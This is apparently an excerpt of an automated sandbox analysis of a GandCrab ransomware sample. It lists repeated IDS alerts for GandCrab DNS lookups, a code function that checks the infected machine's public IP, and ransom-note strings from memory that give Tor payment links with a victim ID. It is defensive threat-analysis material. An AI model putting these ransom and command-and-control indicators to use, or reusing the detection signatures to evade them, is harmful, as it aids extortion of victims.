Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:50787 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:50788 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:50789 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:64123 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:64124 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:64125 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:64126 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:64969 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:64970 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:64971 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:64972 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:49203 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:49204 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:49205 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:49206 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60474 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60475 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60476 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60477 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:59376 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:59377 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:59378 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:59379 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:56618 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:56619 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:56620 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:56621 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:61186 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:61187 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:61188 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:61189 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:57389 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:57390 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:57391 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:57392 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:50230 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:50231 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:50232 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:50233 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:53271 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:53272 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:53273 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:53274 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:59829 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:59830 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:59831 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:59832 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:62433 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:62434 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:62435 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:62436 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:64273 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:64274 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:64275 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:64276 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:51107 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:51108 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:51109 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:51110 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:52457 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:52458 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:52459 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:52460 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:55246 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:55247 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:55248 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:55249 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:64973 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:64974 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:53039 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:53040 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:53041 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:53042 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:55459 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:55460 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:55461 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:55462 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:60818 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:60819 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:60820 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:60821 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:62426 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:62427 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:62428 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:62429 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:61128 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:61129 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:61130 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:61131 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:58914 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:58915 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:58916 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:58917 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:50624 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:50625 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:50626 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:50627 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:55651 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:55652 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:55653 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:55654 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:64378 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:64379 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:64380 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:64381 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:52112 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:52113 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:52114 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:52115 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:63689 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:63690 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:63691 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:63692 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:57826 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:57827 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:57828 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:57829 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:52743 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:52744 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:52745 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:52746 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60646 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60647 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60648 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60649 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:55953 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:55954 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:55955 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:55956 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:51594 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:51595 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:51596 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:51597 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:61361 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:61362 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:61363 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:61364 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:58482 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:58483 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:58484 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:58485 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:51891 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:51892 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:51893 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:51894 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60420 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60421 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60422 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60423 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:54285 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:54286 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:54287 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:54288 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:59765 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:59766 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:59767 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:59768 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:54433 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:54434 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:54435 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:54436 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:65463 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:65464 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:65465 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:65466 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:50092 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:50093 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:50094 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:50095 -> 8.8.8.8:53

Contains functionality to determine the online IP of the system

Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Code function: 1_2_004068F0 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com	1_2_004068F0
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Code function: 1_2_004068F0 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com	1_2_004068F0
Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	Code function: 13_2_004068F0 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com	13_2_004068F0
Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	Code function: 13_2_004068F0 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com	13_2_004068F0
Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	Code function: 21_2_004068F0 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com	21_2_004068F0
Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	Code function: 21_2_004068F0 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com	21_2_004068F0

Found Tor onion address

Source: 9gkAKTWOXp.exe, 00000001.00000000.253403415.000000000040E000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbghvjyqy7jclk.onion/e644d32fec6144de
Source: 9gkAKTWOXp.exe, 00000001.00000000.253403415.000000000040E000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: 1. http://gdcbghvjyqy7jclk.onion.top/e644d32fec6144de
Source: 9gkAKTWOXp.exe, 00000001.00000000.253403415.000000000040E000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: 2. http://gdcbghvjyqy7jclk.onion.casa/e644d32fec6144de
Source: 9gkAKTWOXp.exe, 00000001.00000000.253403415.000000000040E000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: 3. http://gdcbghvjyqy7jclk.onion.guide/e644d32fec6144de
Source: 9gkAKTWOXp.exe, 00000001.00000000.253403415.000000000040E000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: 4. http://gdcbghvjyqy7jclk.onion.rip/e644d32fec6144de
Source: 9gkAKTWOXp.exe, 00000001.00000000.253403415.000000000040E000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: 5. http://gdcbghvjyqy7jclk.onion.plus/e644d32fec6144de
Source: 9gkAKTWOXp.exe, 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbghvjyqy7jclk.onion/e644d32fec6144de
Source: 9gkAKTWOXp.exe, 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: 1. http://gdcbghvjyqy7jclk.onion.top/e644d32fec6144de
Source: 9gkAKTWOXp.exe, 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: 2. http://gdcbghvjyqy7jclk.onion.casa/e644d32fec6144de
Source: 9gkAKTWOXp.exe, 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: 3. http://gdcbghvjyqy7jclk.onion.guide/e644d32fec6144de
Source: 9gkAKTWOXp.exe, 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: 4. http://gdcbghvjyqy7jclk.onion.rip/e644d32fec6144de
Source: 9gkAKTWOXp.exe, 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: 5. http://gdcbghvjyqy7jclk.onion.plus/e644d32fec6144de
Source: vkspii.exe, 0000000D.00000000.288179215.000000000040E000.00000008.00000001.01000000.00000006.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbghvjyqy7jclk.onion/e644d32fec6144de
Source: vkspii.exe, 0000000D.00000000.288179215.000000000040E000.00000008.00000001.01000000.00000006.sdmp	String found in binary or memory: 1. http://gdcbghvjyqy7jclk.onion.top/e644d32fec6144de
Source: vkspii.exe, 0000000D.00000000.288179215.000000000040E000.00000008.00000001.01000000.00000006.sdmp	String found in binary or memory: 2. http://gdcbghvjyqy7jclk.onion.casa/e644d32fec6144de
Source: vkspii.exe, 0000000D.00000000.288179215.000000000040E000.00000008.00000001.01000000.00000006.sdmp	String found in binary or memory: 3. http://gdcbghvjyqy7jclk.onion.guide/e644d32fec6144de
Source: vkspii.exe, 0000000D.00000000.288179215.000000000040E000.00000008.00000001.01000000.00000006.sdmp	String found in binary or memory: 4. http://gdcbghvjyqy7jclk.onion.rip/e644d32fec6144de
Source: vkspii.exe, 0000000D.00000000.288179215.000000000040E000.00000008.00000001.01000000.00000006.sdmp	String found in binary or memory: 5. http://gdcbghvjyqy7jclk.onion.plus/e644d32fec6144de
Source: vkspii.exe, 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbghvjyqy7jclk.onion/e644d32fec6144de
Source: vkspii.exe, 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmp	String found in binary or memory: 1. http://gdcbghvjyqy7jclk.onion.top/e644d32fec6144de
Source: vkspii.exe, 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmp	String found in binary or memory: 2. http://gdcbghvjyqy7jclk.onion.casa/e644d32fec6144de
Source: vkspii.exe, 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmp	String found in binary or memory: 3. http://gdcbghvjyqy7jclk.onion.guide/e644d32fec6144de
